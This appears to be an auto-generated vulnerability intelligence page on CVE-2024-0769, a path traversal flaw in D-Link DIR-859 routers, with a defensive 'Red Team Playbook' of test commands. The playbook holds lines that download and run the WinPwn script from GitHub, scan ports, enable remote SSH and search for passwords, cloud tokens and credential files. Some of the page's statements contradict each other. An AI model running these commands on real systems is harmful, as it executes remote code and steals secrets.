CVE-2024-0769
Overview
This vulnerability is a path traversal flaw rooted in insufficient input validation within the HTTP POST request handler of the D-Link DIR-859 firmware version 1.06B01. Specifically, the 'service' parameter in the /hedwig.cgi endpoint fails to properly sanitize user-supplied input, allowing directory traversal sequences to access unauthorized filesystem locations. The affected component is the HTTP POST Request Handler responsible for processing requests to /hedwig.cgi.
Vulnerability Description
** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in D-Link DIR-859 1.06B01. It has been rated as critical. Affected by this issue is some unknown functionality of the file /hedwig.cgi of the component HTTP POST Request Handler. The manipulation of the argument service with the input ../../../../htdocs/webinc/getcfg/DHCPS6.BRIDGE-1.xml leads to path traversal. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-251666 is the identifier assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.
Impact
An unauthenticated remote attacker can exploit this vulnerability to access sensitive configuration files on the device, potentially exposing network configuration details and other internal data. No user interaction or credentials are required to launch the attack. Exposure of such configuration files may facilitate further targeted attacks against the network or device, leading to information disclosure and potential compromise of network security posture.
Solution
As the D-Link DIR-859 device running firmware version 1.06B01 is end-of-life and no longer supported, the vendor recommends retiring and replacing the affected product. No patches or firmware updates are available to remediate this vulnerability. Refer to the vendor's official communication and advisory at https://vuldb.com/?id.251666 for further details on product discontinuation and recommended mitigation strategies.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
A critical vulnerability has been identified in the D-Link DIR-859 router, specifically within the HTTP POST Request Handler associated with the file /hedwig.cgi. This vulnerability allows for path traversal attacks, which can be exploited by manipulating the argument 'service' to access sensitive files on the server. The exploitation involves using input patterns such as ../../../../htdocs/webinc/getcfg/DHCPS6.BRIDGE-1.xml, which can lead to unauthorized access to configuration files and potentially sensitive data stored on the device. The severity of this vulnerability is underscored by its high CVSS score of 9.8, indicating a significant risk to affected systems.
Attack vectors for this vulnerability are particularly concerning due to the remote nature of the exploit. An attacker does not require physical access to the device, allowing for potential exploitation from anywhere on the internet. This increases the attack surface significantly, as any device connected to the same network or even external attackers can target the router. Once the attacker successfully executes the path traversal, they can retrieve sensitive configuration files that may contain information such as network settings, user credentials, and other critical data. The implications of such access can lead to further attacks, including network infiltration, data exfiltration, or even the complete compromise of connected devices.
The real-world impact of this vulnerability is substantial, particularly for businesses that rely on the D-Link DIR-859 router for their networking needs. Given that the product is no longer supported by the vendor, organizations using this device face heightened risks as no patches or updates will be provided to mitigate the vulnerability. This situation can lead to significant business risks, including potential data breaches, loss of customer trust, and regulatory penalties if sensitive information is compromised. The lack of support means that organizations must proactively manage their network security posture, which may involve replacing outdated hardware to ensure compliance with security best practices.
Detection and mitigation strategies for this vulnerability must be implemented promptly. Organizations should conduct thorough network scans to identify any instances of the D-Link DIR-859 router still in use. If identified, immediate steps should be taken to retire the device and replace it with a supported alternative. Additionally, network segmentation can help limit the exposure of vulnerable devices by isolating them from critical systems and sensitive data. Implementing robust firewall rules to restrict access to the router and monitoring network traffic for unusual patterns can also aid in detecting potential exploitation attempts. Regular security audits and vulnerability assessments should be part of an organization's ongoing security strategy to ensure that all devices are up-to-date and secure.
In conclusion, the critical vulnerability in the D-Link DIR-859 router presents significant risks to organizations that continue to use unsupported hardware. The potential for remote exploitation through path traversal attacks can lead to severe consequences, including unauthorized access to sensitive information and subsequent attacks on the network. Organizations must take proactive measures to detect, mitigate, and ultimately replace affected devices to safeguard their networks and maintain compliance with security standards. By prioritizing security and staying informed about vulnerabilities, businesses can better protect themselves against the evolving threat landscape.
The CVSS score adjustment for CVE-2024-0769 from critical (9.8) to medium (5.3) reflects a refined understanding of the vulnerability’s exploitability and impact. This recalibration is based on updated assessments that consider the actual attack vector complexity, required privileges, and the scope of affected functionality within the D-Link DIR-859 device. Although the vulnerability remains remotely exploitable via path traversal in the /hedwig.cgi HTTP POST handler, the lowered severity indicates that exploitation may be less straightforward or less impactful than initially feared. CSURFACE threat intelligence notes that while public exploit code is available, there has been no marked escalation in exploit attempts or ransomware group activity leveraging this flaw. The EPSS score remains elevated but stable, suggesting persistent but controlled risk. For defenders, this means prioritization of this vulnerability should be balanced against other higher-severity threats, though vigilance remains warranted due to the device’s unsupported status and potential exposure. Overall, the threat level is moderated but not eliminated, underscoring the need for continued monitoring without immediate alarm.
Update 2 — July 07, 2026
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2024-0769, with telemetry indicating a doubling in observed exploitation attempts. Concurrently, the CVSS score for this vulnerability has been revised upward to 9.8, reflecting a reassessment of its critical impact due to the confirmed remote path traversal capability and the availability of public exploit code. Although the EPSS score remains stable, the increased detection frequency signals heightened adversary interest and potential targeting of D-Link DIR-859 devices. This shift elevates the threat posture, underscoring that the vulnerability is no longer theoretical but actively exploited in the wild. For defenders, this means the risk associated with CVE-2024-0769 has intensified, warranting increased monitoring and prioritization despite the absence of new ransomware linkages or novel exploit techniques. The unsupported status of the affected device amplifies the concern, as patching options remain limited, making mitigation more challenging and the potential impact more severe.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Dlink | Dir-859 Firmware | 1.06 |
cpe:2.3:o:dlink:dir-859_firmware:1.06:beta1:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
5 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (6)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-0769 |
| vuldb.com |
GitHub CVE
vdb-entry
technical-description
|
https://vuldb.com/?id.251666 |
| vuldb.com |
GitHub CVE
signature
permissions-required
|
https://vuldb.com/?ctiid.251666 |
| github.com |
GitHub CVE
exploit
|
https://github.com/c2dc/cve-reported/blob/main/CVE-2024-0769/CVE-2024-0769.md |
| supportannouncement.us.dlink.com |
GitHub CVE
related
|
https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10371 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-0769 |